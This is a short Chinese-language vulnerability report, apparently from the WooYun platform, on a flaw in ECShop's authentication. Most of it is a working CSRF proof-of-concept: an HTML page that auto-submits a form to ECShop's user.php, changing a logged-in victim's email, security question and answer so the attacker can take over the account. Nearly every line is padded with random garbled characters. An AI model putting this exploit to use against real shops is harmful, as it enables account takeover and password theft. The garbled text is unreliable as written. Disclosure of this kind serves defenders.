简要描述:
v0 H, k& o6 f* o- H+ W" s" f- Kecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
/ y6 S/ |* e. v- `) z5 P3 ]$ I O' D6 o* t, g0 q- }) p
Demo For:http://www.wooyun.org/bug.php?action=view&id=395 U/ Z- y! f8 F( \
$ E$ }6 |, _, m# A+ j8 @9 ^
详细说明:" }% h! x. g3 g0 A
利用csrf和xss可以突破官方所说的“障碍”4 }/ P3 G& w: n, c F
xss版本已经有人说明2 C' L8 ~: {, N6 _ e Y. p
这里给出csrf版本) c4 Y; t5 q+ i& B+ a
% G' E9 |! A, _
漏洞证明:
" D4 j; t v, B/ m/ T0 n0 H<html>3 k* e9 F, x* y1 U0 T J& E( d f
<body>
5 b$ X$ W7 E0 i/ `! }0 i<form action="http://www.wooyun.org/ecshop/user.php" method="POST">, n1 t. ?" l' ?! U% f& i9 {0 _
<INPUT TYPE="text" NAME="email" value="[email protected]">
( v* T7 p( J- g6 d- S9 Q# l- @<INPUT TYPE="text" NAME="act" value="act_edit_profile">
/ B. Z5 |: u9 o- x; p3 i<INPUT TYPE="text" NAME="sel_question" value="ecshop">% k4 f Y9 b/ P/ y3 o \+ P7 a
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">& N4 w* { K0 L" _% k9 l7 W
</body>
! u8 x, g2 o- X: t# o<script>/ Q, k2 v: m' e4 s. m# `
document.forms[0].submit();6 o, z/ w2 Z/ f3 x) ]. g( r- b
</script>
$ s* p9 j) d/ J" H/ F9 F+ [</html> N. B, ]: c- M/ _ T8 |, o
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
& V% ?, S! I. f: Y
( o: }; W/ X9 C. G B% [2 l |